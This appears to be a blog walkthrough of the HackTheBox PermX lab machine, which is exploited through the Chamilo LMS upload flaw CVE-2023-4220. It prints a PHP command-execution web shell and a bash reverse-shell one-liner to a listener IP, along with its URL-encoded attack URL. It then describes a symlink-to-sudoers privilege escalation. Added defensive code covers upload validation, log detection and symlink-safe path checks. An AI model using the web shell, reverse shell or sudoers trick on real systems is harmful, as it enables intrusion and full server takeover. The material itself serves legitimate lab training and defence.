Introduction

In this HackTheBox PermX walkthrough, we explore the PermX machine from Hack The Box (HTB), focusing on exploiting the Chamilo LMS vulnerability identified as CVE-2023-4220.

HackTheBox PermX Description

`PermX` is an Easy Difficulty Linux machine featuring a learning management system vulnerable to unrestricted file uploads via [CVE-2023-4220](https://nvd.nist.gov/vuln/detail/CVE-2023-4220). This vulnerability is leveraged to gain a foothold on the machine. Enumerating the machine reveals credentials that lead to SSH access. A `sudo` misconfiguration is then exploited to gain a `root` shell.

Enumeration

We begin by scanning the target machine using Nmap, which reveals open SSH and HTTP ports.

After adding permx.htb to the /etc/hosts file, we access the domain and discover a static website. By fuzzing virtual hosts, we identify two subdomains: www and lms.

The lms subdomain presents an admin login panel. Notably, the robots.txt file lists several routes, and the documentation section discloses the specific version of Chamilo in use.

Exploitation

Researching the identified Chamilo version leads us to CVE-2023-4220, which allows unauthenticated file uploads via the Big Upload feature.

CVE-2023-4220

CVE-2023-4220 is a critical security vulnerability identified in Chamilo LMS versions up to and including 1.11.24. This flaw allows unauthenticated attackers to upload malicious files via the ‘big file upload’ functionality, leading to potential remote code execution and stored cross-site scripting (XSS) attacks.

Technical Details:

The vulnerability stems from inadequate validation in the bigUpload.php script located at /main/inc/lib/javascript/bigupload/inc/bigUpload.php. Attackers can exploit this by uploading a web shell to the /main/inc/lib/javascript/bigupload/files/ directory, enabling unauthorized code execution on the server.

Impact:

Exploitation of this vulnerability can compromise the confidentiality, integrity, and availability of the affected system. The National Vulnerability Database (NVD) has assigned it a CVSS score of 8.1, categorizing it as a high-severity issue.

Mitigation:

To address this vulnerability, it is recommended to update Chamilo LMS to version 1.11.26 or later, where the issue has been resolved. Additionally, implementing strict input validation and access controls for file uploads can help prevent similar vulnerabilities.
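The "strict input validation" mentioned above is easy to state and easy to get wrong, so here is an added example (not Chamilo's code, and not from the original write-up) of what a file-upload name check has to cover to close the kind of gap CVE-2023-4220 describes: path separators, double extensions such as `shell.php.jpg`, case variants, dotfiles, and the client choosing the stored name at all. The allowlist and the `server_side_name` helper are assumptions made for the example.

```python
import re
import secrets

# Constructed allowlist for a hypothetical upload endpoint. Chamilo's own
# configuration is not on the page and is not reproduced here.
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "txt", "zip"}

# Extensions a PHP-enabled web server may hand to the interpreter. They are
# rejected wherever they appear in the name, so "shell.php.jpg" fails too.
EXECUTABLE_EXTENSIONS = {"php", "phtml", "phar", "php3", "php4", "php5", "php7", "phps"}

# Conservative character set; the first character must be alphanumeric, which
# also blocks dotfiles such as ".htaccess".
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")


def validate_upload_name(filename: str) -> tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied file name."""
    # Any path separator means the client is trying to pick the directory.
    if "/" in filename or "\\" in filename:
        return False, "path separators are not allowed"
    if not SAFE_NAME.match(filename):
        return False, "name contains disallowed characters"
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False, "missing extension"
    exts = parts[1:]
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False, "executable extension present"
    if exts[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension .{exts[-1]} is not in the allowlist"
    return True, "ok"


def server_side_name(filename: str) -> str:
    """Choose the stored name on the server: a random token plus the validated
    extension, so the client never controls what ends up on disk."""
    accepted, reason = validate_upload_name(filename)
    if not accepted:
        raise ValueError(reason)
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"
```

Name validation is only half of the control: the upload directory should also be served with script execution disabled (or live outside the web root entirely), so that a file which slips through is still returned as static content rather than run by PHP.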

Shell

We attempt to exploit this vulnerability using an automated bash script alongside a PHP reverse shell. Although the shell uploads successfully, it fails to function as intended.

We then manually upload a simple PHP backdoor using the curl command and confirm its functionality by executing the id command.

```php
<?php

// Check if a 'cmd' parameter exists in the request
if (isset($_REQUEST['cmd'])) {
    // Output formatted text
    echo "<pre>";

    // Retrieve the 'cmd' parameter from the request
    $cmd = $_REQUEST['cmd'];

    // Execute the system command provided in the 'cmd' parameter
    system($cmd);

    // Close the formatted text block
    echo "</pre>";

    // Stop further script execution
    die;
}

?>
```

Save the above PHP code as shell.php. Then we can take a bash reverse shell one-liner, URL-encode it, and pass it through the cmd parameter in the URL.

```bash
bash -c 'bash -i >& /dev/tcp/10.10.16.66/4444 0>&1'
# URL-encoded
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.66%2F4444%200%3E%261%27
# Inject it in the URL below
http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.66%2F4444%200%3E%261%27
```

To establish a reverse shell, we inject a payload that initiates a connection to our listener, achieving successful execution.
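From the defender's side, every step in this section leaves a trace in the web server's access log: a POST to bigUpload.php, then requests for a .php file under the bigupload files directory, then a cmd= parameter carrying the command. The following added example (not part of the original write-up, and not a Chamilo or HTB tool) parses combined-format log lines and flags those three patterns; the sample lines are constructed for the example and reuse the paths, listener address and URL-encoded payload quoted above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths taken from the CVE-2023-4220 description above.
UPLOAD_SCRIPT = "/main/inc/lib/javascript/bigupload/inc/bigUpload.php"
UPLOAD_DIR = "/main/inc/lib/javascript/bigupload/files/"
EXECUTABLE_EXTENSIONS = {"php", "phtml", "phar", "php3", "php4", "php5", "php7", "phps"}

# Apache/nginx combined-format request line; only the fields used here are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (timestamps and sizes are made up for the example).
SAMPLE_LOG = """\
10.10.16.66 - - [10/Jul/2024:12:00:01 +0000] "GET /main/inc/lib/javascript/bigupload/inc/bigUpload.php HTTP/1.1" 200 512
10.10.16.66 - - [10/Jul/2024:12:00:02 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php HTTP/1.1" 200 17
10.10.16.66 - - [10/Jul/2024:12:00:05 +0000] "GET /main/inc/lib/javascript/bigupload/files/shell.php?cmd=id HTTP/1.1" 200 60
10.10.16.66 - - [10/Jul/2024:12:00:09 +0000] "GET /main/inc/lib/javascript/bigupload/files/shell.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.66%2F4444%200%3E%261%27 HTTP/1.1" 200 0
10.10.14.3 - - [10/Jul/2024:12:01:00 +0000] "GET /main/inc/lib/javascript/bigupload/files/lecture.pdf HTTP/1.1" 200 90311
"""


def analyse_line(line: str):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = unquote(url.path)
    query = parse_qs(url.query)
    reasons = []
    # 1. Upload traffic to the vulnerable script: an unauthenticated POST here
    #    is the CVE's entry point and worth alerting on until the host is patched.
    if m["method"] == "POST" and path == UPLOAD_SCRIPT:
        reasons.append("post-to-bigupload")
    # 2. Anything server-executable being requested from the upload directory.
    if path.startswith(UPLOAD_DIR):
        exts = path.rsplit("/", 1)[-1].lower().split(".")[1:]
        if any(e in EXECUTABLE_EXTENSIONS for e in exts):
            reasons.append("executable-in-upload-dir")
    # 3. A cmd= parameter, the control channel of the web shell shown above.
    if "cmd" in query:
        reasons.append("cmd-parameter")
    if not reasons:
        return None
    return {
        "ip": m["ip"],
        "timestamp": m["ts"],
        "path": path,
        "reasons": reasons,
        # Decoded so the analyst sees the actual command, not the percent-encoding.
        "cmd": query["cmd"][0] if "cmd" in query else None,
    }


def scan(log_text: str):
    """Run analyse_line over every line and return the findings in order."""
    return [f for f in map(analyse_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The decoded `cmd` value is what makes the alert actionable: the fourth sample line decodes back to the exact reverse-shell one-liner from the section above, which is a far clearer signal to a responder than the percent-encoded string in the raw log.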

Privilege Escalation

After upgrading to an interactive TTY shell, we identify two users on the system.

We test the password found in the Chamilo configuration file with the mtz user, gaining access.

Checking the user’s sudo privileges reveals the ability to execute /opt/acl.sh without a password. This script modifies file permissions but restricts the target to the user’s home directory.

By creating a symbolic link to the /etc/sudoers file within the home directory and using the script to grant write permissions, we edit the sudoers file to provide the mtz user with all privileges.

This allows us to switch to the root user and complete the privilege escalation process.
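The weakness exploited above is that the script apparently checks only the textual prefix of the path (is it under the home directory?) rather than what the path actually resolves to. The added example below (not the machine's /opt/acl.sh, which the write-up does not show, and not part of the original post) shows the check a privileged permission-changing helper would need in order to reject the symlink trick: refuse `..` escapes, refuse a symlink at any component below the home directory, and confirm the canonical path still lives under the canonical home. `build_demo` creates a throwaway fixture with a fake home, a legitimate file, and symlinks to a stand-in for /etc/sudoers.

```python
import os
import tempfile


def is_safe_target(path: str, home: str) -> bool:
    """True only if `path` names a regular file that is genuinely inside `home`:
    no '..' escape, no symlink at any component below home, and the canonical
    path still resolves under the canonical home."""
    home_abs = os.path.abspath(home)
    rel = os.path.relpath(os.path.abspath(path), home_abs)
    if rel == os.pardir or rel.startswith(os.pardir + os.sep):
        return False  # ../ escape out of the home directory
    cur = home_abs
    for component in rel.split(os.sep):
        cur = os.path.join(cur, component)
        if os.path.islink(cur):
            return False  # a symlinked file *or* directory would redirect us
    real = os.path.realpath(cur)
    home_real = os.path.realpath(home_abs)
    if os.path.commonpath([real, home_real]) != home_real:
        return False
    return os.path.isfile(real)


def build_demo() -> dict:
    """Constructed fixture mimicking the sudoers trick: a fake home containing
    a normal file, a symlink to a file outside the home, and a symlinked
    directory. Returns the verdict for each case."""
    root = tempfile.mkdtemp()
    home = os.path.join(root, "home", "mtz")
    os.makedirs(home)
    outside = os.path.join(root, "etc", "sudoers")  # stands in for /etc/sudoers
    os.makedirs(os.path.dirname(outside))
    open(outside, "w").close()
    legit = os.path.join(home, "notes.txt")
    open(legit, "w").close()
    os.symlink(outside, os.path.join(home, "sudoers_link"))
    os.symlink(os.path.dirname(outside), os.path.join(home, "etc_link"))
    return {
        "legit": is_safe_target(legit, home),
        "symlink_file": is_safe_target(os.path.join(home, "sudoers_link"), home),
        "symlink_dir": is_safe_target(os.path.join(home, "etc_link", "sudoers"), home),
        "dotdot": is_safe_target(os.path.join(home, "..", "..", "etc", "sudoers"), home),
        "outside": is_safe_target(outside, home),
    }


if __name__ == "__main__":
    for case, verdict in build_demo().items():
        print(f"{case}: {'allowed' if verdict else 'rejected'}")
```

Even this check is only a partial fix, because the target can be swapped for a symlink between the check and the chmod (a time-of-check/time-of-use race). The durable mitigation is not to grant an unprivileged user a passwordless sudo path to anything that changes permissions at all; if it is truly needed, the helper should operate on a file descriptor it opened itself with `O_NOFOLLOW` rather than on a path string.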

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.